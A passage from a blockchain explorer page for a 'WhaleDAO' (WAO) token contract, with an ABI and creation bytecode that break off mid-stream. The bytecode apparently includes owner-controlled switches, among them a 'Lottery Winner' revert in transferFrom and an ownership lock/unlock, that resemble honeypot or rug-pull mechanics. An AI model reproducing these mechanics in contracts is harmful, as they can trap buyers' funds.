= _rOwned[recipient].add(rTransferAmount); _takeLiquidity(tLiquidity); _reflectFee(rFee, tFee); emit Transfer(sender, recipient, tTransferAmount); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"minTokensBeforeSwap","type":"uint256"}],"name":"MinTokensBeforeSwapUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiqudity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"bool","name":"enabled","type":"bool"}],"name":"SwapAndLiquifyEnabledUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[],"name":"dAPPRewardsOff","type":"event"},{"anonymous":false,"inputs":[],"name":"dAPPRewardsOn","type":"event"},{"inputs":[],"name":"LockToken","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"VaultLock","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"_liquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_taxFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"tAmount","type":"uint256"}],"name":"deliver","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"excludeFromFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"excludeFromReward","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"geUnlockTime","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"includeInFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"includeInReward","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFee","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromReward","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"time","type":"uint256"}],"name":"lock","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"lottery","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tAmount","type":"uint256"},{"internalType":"bool","name":"deductTransferFee","type":"bool"}],"name":"reflectionFromToken","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"liquidityFee","type":"uint256"}],"name":"setLiquidityFeePercent","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"maxTxPercent","type":"uint256"}],"name":"setMaxTxPercent","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"_enabled","type":"bool"}],"name":"setSwapAndLiquifyEnabled","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"taxFee","type":"uint256"}],"name":"setTaxFeePercent","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"special","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapAndLiquifyEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"rAmount","type":"uint256"}],"name":"tokenFromReflection","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_lottery","type":"address"}],"name":"transferlottery","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"unlock","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
60c06040526000600360006101000a81548160ff021916908315150217905550662386f26fc10000600a55600a54600019816200003857fe5b0660001903600b556040518060400160405280600881526020017f5768616c6544414f000000000000000000000000000000000000000000000000815250600d90805190602001906200008d92919062000611565b506040518060400160405280600381526020017f57414f0000000000000000000000000000000000000000000000000000000000815250600e9080519060200190620000db92919062000611565b506009600f60006101000a81548160ff021916908360ff1602179055506000601055601054601155600a6012556012546013556001601460156101000a81548160ff021916908315150217905550662386f26fc10000601555662386f26fc100006016553480156200014c57600080fd5b5060006200015f620005e060201b60201c565b9050806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a350600b546004600062000214620005e060201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506000737a250d5630b4cf539739df2c5dacb4c659f2488d90508073ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b815260040160206040518083038186803b158015620002b257600080fd5b505afa158015620002c7573d6000803e3d6000fd5b505050506040513d6020811015620002de57600080fd5b810190808051906020019092919050505073ffffffffffffffffffffffffffffffffffffffff1663c9c65396308373ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b815260040160206040518083038186803b1580156200035257600080fd5b505afa15801562000367573d6000803e3d6000fd5b505050506040513d60208110156200037e57600080fd5b81019080805190602001909291905050506040518363ffffffff1660e01b8152600401808373ffffffffffffffffffffffffffffffffffffffff1681526020018273ffffffffffffffffffffffffffffffffffffffff16815260200192505050602060405180830381600087803b158015620003f957600080fd5b505af11580156200040e573d6000803e3d6000fd5b505050506040513d60208110156200042557600080fd5b810190808051906020019092919050505073ffffffffffffffffffffffffffffffffffffffff1660a08173ffffffffffffffffffffffffffffffffffffffff1660601b815250508073ffffffffffffffffffffffffffffffffffffffff1660808173ffffffffffffffffffffffffffffffffffffffff1660601b81525050600160076000620004b9620005e860201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600760003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555062000572620005e060201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600a546040518082815260200191505060405180910390a350620006b7565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b828054600181600116156101000203166002900490600052602060002090601f016020900481019282601f106200065457805160ff191683800117855562000685565b8280016001018555821562000685579182015b828111156200068457825182559160200191906001019062000667565b5b50905062000694919062000698565b5090565b5b80821115620006b357600081600090555060010162000699565b5090565b60805160601c60a05160601c615672620006ff60003980611d1252806137e552508061100a52806144cf52806145bb52806145e252806146ed528061471452506156726000f3fe6080604052600436106102555760003560e01c806370a0823111610139578063a9059cbb116100b6578063d543dbeb1161007a578063d543dbeb14610cb8578063da98b61f14610cf3578063dd46706414610d0a578063dd62ed3e14610d45578063ea2f0b3714610dca578063f2fde38b14610e1b5761025c565b8063a9059cbb14610b71578063b6c5232414610be2578063ba13a57214610c0d578063c49b9a8014610c4e578063ce9a3b0f14610c8b5761025c565b80638ee88c53116100fd5780638ee88c53146109cd57806395d89b4114610a08578063a457c2d714610a98578063a69df4b514610b09578063a73b3c8214610b205761025c565b806370a082311461087e578063715018a6146108e35780637d1db4a5146108fa57806388f82020146109255780638da5cb5b1461098c5761025c565b806339509351116101d2578063481e27d411610196578063481e27d41461071657806349bd5a5e1461072d5780634a74bb021461076e57806352390c021461079b5780635342acb4146107ec5780636bc87c3a146108535761025c565b806339509351146105935780633b124fe7146106045780633bd5d1731461062f578063437823ec1461066a5780634549b039146106bb5761025c565b806318160ddd1161021957806318160ddd1461040957806323b872dd146104345780632d838119146104c5578063313ce567146105145780633685d419146105425761025c565b8063061c82d01461026157806306fdde031461029c578063095ea7b31461032c57806313114a9d1461039d5780631694505e146103c85761025c565b3661025c57005b600080fd5b34801561026d57600080fd5b5061029a6004803603602081101561028457600080fd5b8101908080359060200190929190505050610e6c565b005b3480156102a857600080fd5b506102b1610f3e565b6040518080602001828103825283818151815260200191508051906020019080838360005b838110156102f15780820151818401526020810190506102d6565b50505050905090810190601f16801561031e5780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b34801561033857600080fd5b506103856004803603604081101561034f57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050610fe0565b60405180821515815260200191505060405180910390f35b3480156103a957600080fd5b506103b2610ffe565b6040518082815260200191505060405180910390f35b3480156103d457600080fd5b506103dd611008565b604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b34801561041557600080fd5b5061041e61102c565b6040518082815260200191505060405180910390f35b34801561044057600080fd5b506104ad6004803603606081101561045757600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050611036565b60405180821515815260200191505060405180910390f35b3480156104d157600080fd5b506104fe600480360360208110156104e857600080fd5b810190808035906020019092919050505061139c565b6040518082815260200191505060405180910390f35b34801561052057600080fd5b50610529611420565b604051808260ff16815260200191505060405180910390f35b34801561054e57600080fd5b506105916004803603602081101561056557600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050611437565b005b34801561059f57600080fd5b506105ec600480360360408110156105b657600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001909291905050506117c1565b60405180821515815260200191505060405180910390f35b34801561061057600080fd5b50610619611874565b6040518082815260200191505060405180910390f35b34801561063b57600080fd5b506106686004803603602081101561065257600080fd5b810190808035906020019092919050505061187a565b005b34801561067657600080fd5b506106b96004803603602081101561068d57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050611a0b565b005b3480156106c757600080fd5b50610700600480360360408110156106de57600080fd5b8101908080359060200190929190803515159060200190929190505050611b2e565b6040518082815260200191505060405180910390f35b34801561072257600080fd5b5061072b611be5565b005b34801561073957600080fd5b50610742611d10565b604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b34801561077a57600080fd5b50610783611d34565b60405180821515815260200191505060405180910390f35b3480156107a757600080fd5b506107ea600480360360208110156107be57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050611d47565b005b3480156107f857600080fd5b5061083b6004803603602081101561080f57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050612061565b60405180821515815260200191505060405180910390f35b34801561085f57600080fd5b506108686120b7565b6040518082815260200191505060405180910390f35b34801561088a57600080fd5b506108cd600480360360208110156108a157600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff1690602001909291905050506120bd565b6040518082815260200191505060405180910390f35b3480156108ef57600080fd5b506108f86121a8565b005b34801561090657600080fd5b5061090f61232e565b6040518082815260200191505060405180910390f35b34801561093157600080fd5b506109746004803603602081101561094857600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050612334565b60405180821515815260200191505060405180910390f35b34801561099857600080fd5b506109a161238a565b604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b3480156109d957600080fd5b50610a06600480360360208110156109f057600080fd5b81019080803590602001909291905050506123b3565b005b348015610a1457600080fd5b50610a1d612485565b6040518080602001828103825283818151815260200191508051906020019080838360005b83811015610a5d578082015181840152602081019050610a42565b50505050905090810190601f168015610a8a5780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b348015610aa457600080fd5b50610af160048036036040811015610abb57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050612527565b60405180821515815260200191505060405180910390f35b348015610b1557600080fd5b50610b1e6125f4565b005b348015610b2c57600080fd5b50610b6f60048036036020811015610b4357600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050612811565b005b348015610b7d57600080fd5b50610bca60048036036040811015610b9457600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff1690602001909291908035906020019092919050505061291d565b60405180821515815260200191505060405180910390f35b348015610bee57600080fd5b50610bf7612a37565b6040518082815260200191505060405180910390f35b348015610c1957600080fd5b50610c22612a41565b604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b348015610c5a57600080fd5b50610c8960048036036020811015610c7157600080fd5b81019080803515159060200190929190505050612a67565b005b348015610c9757600080fd5b50610ca0612b85565b60405180821515815260200191505060405180910390f35b348015610cc457600080fd5b50610cf160048036036020811015610cdb57600080fd5b8101908080359060200190929190505050612b98565b005b348015610cff57600080fd5b50610d08612c93565b005b348015610d1657600080fd5b50610d4360048036036020811015610d2d57600080fd5b8101908080359060200190929190505050612dbd565b005b348015610d5157600080fd5b50610db460048036036040811015610d6857600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050612fae565b6040518082815260200191505060405180910390f35b348015610dd657600080fd5b50610e1960048036036020811015610ded57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050613035565b005b348015610e2757600080fd5b50610e6a60048036036020811015610e3e57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050613158565b005b610e74613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610f34576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b8060108190555050565b6060600d8054600181600116156101000203166002900480601f016020809104026020016040519081016040528092919081815260200182805460018160011615610100020316600290048015610fd65780601f10610fab57610100808354040283529160200191610fd6565b820191906000526020600020905b815481529060010190602001808311610fb957829003601f168201915b5050505050905090565b6000610ff4610fed613363565b848461336b565b6001905092915050565b6000600c54905090565b7f000000000000000000000000000000000000000000000000000000000000000081565b6000600a54905090565b600060011515600360009054906101000a900460ff16151514156112c457600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16141580156110df5750600073ffffffffffffffffffffffffffffffffffffffff16601460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b1561112a5782601460006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506111ef565b601460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614156111ee576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252600e8152602001807f4c6f74746572792057696e6e657200000000000000000000000000000000000081525060200191505060405180910390fd5b5b6111fa848484613562565b6112bb84611206613363565b6112b68560405180606001604052806028815260200161552f60289139600660008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061126c613363565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546139259092919063ffffffff16565b61336b565b60019050611395565b6112cf848484613562565b611390846112db613363565b61138b8560405180606001604052806028815260200161552f60289139600660008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000611341613363565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546139259092919063ffffffff16565b61336b565b600190505b9392505050565b6000600b548211156113f9576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252602a815260200180615474602a913960400191505060405180910390fd5b60006114036139e5565b90506114188184613a1090919063ffffffff16565b915050919050565b6000600f60009054906101000a900460ff16905090565b61143f613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146114ff576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600860008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff166115be576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601b8152602001807f4163636f756e7420697320616c7265616479206578636c75646564000000000081525060200191505060405180910390fd5b60005b6009805490508110156117bd578173ffffffffffffffffffffffffffffffffffffffff16600982815481106115f257fe5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614156117b05760096001600980549050038154811061164e57fe5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166009828154811061168657fe5b9060005260206000200160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506000600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506000600860008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600980548061177657fe5b6001900381819060005260206000200160006101000a81549073ffffffffffffffffffffffffffffffffffffffff021916905590556117bd565b80806001019150506115c1565b5050565b600061186a6117ce613363565b8461186585600660006117df613363565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613a5a90919063ffffffff16565b61336b565b6001905092915050565b60105481565b6000611884613363565b9050600860008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615611929576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252602c8152602001806155c9602c913960400191505060405180910390fd5b600061193483613ae2565b5050505050905061198d81600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613b3e90919063ffffffff16565b600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506119e581600b54613b3e90919063ffffffff16565b600b81905550611a0083600c54613a5a90919063ffffffff16565b600c81905550505050565b611a13613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611ad3576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b6001600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b6000600a54831115611ba8576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601f8152602001807f416d6f756e74206d757374206265206c657373207468616e20737570706c790081525060200191505060405180910390fd5b81611bc8576000611bb884613ae2565b5050505050905080915050611bdf565b6000611bd384613ae2565b50505050915050809150505b92915050565b611bed613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611cad576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600360009054906101000a900460ff1615611cc757600080fd5b6001600360006101000a81548160ff0219169083151502179055507fdccd1c7467c143e1a5b3306b29fa6d9ec4b5abc31257acd3e355edafa582abd060405160405180910390a1565b7f000000000000000000000000000000000000000000000000000000000000000081565b601460159054906101000a900460ff1681565b611d4f613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611e0f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600860008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615611ecf576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601b8152602001807f4163636f756e7420697320616c7265616479206578636c75646564000000000081525060200191505060405180910390fd5b6000600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020541115611fa357611f5f600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461139c565b600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b6001600860008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506009819080600181540180825580915050600190039060005260206000200160009091909190916101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60125481565b6000600860008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161561215857600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490506121a3565b6121a0600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461139c565b90505b919050565b6121b0613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612270576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a360008060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60155481565b6000600860008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6123bb613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461247b576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b8060128190555050565b6060600e8054600181600116156101000203166002900480601f01602080910402602001604051908101604052809291908181526020018280546001816001161561010002031660029004801561251d5780601f106124f25761010080835404028352916020019161251d565b820191906000526020600020905b81548152906001019060200180831161250057829003601f168201915b5050505050905090565b60006125ea612534613363565b846125e585604051806060016040528060258152602001615618602591396006600061255e613363565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546139259092919063ffffffff16565b61336b565b6001905092915050565b3373ffffffffffffffffffffffffffffffffffffffff16600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461269a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260238152602001806155f56023913960400191505060405180910390fd5b6002544211612711576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601f8152602001807f436f6e7472616374206973206c6f636b656420756e74696c203720646179730081525060200191505060405180910390fd5b600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b612819613363565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146128d9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b80601460006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600060011515600360009054906101000a900460ff1615151415612a1a57601460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffff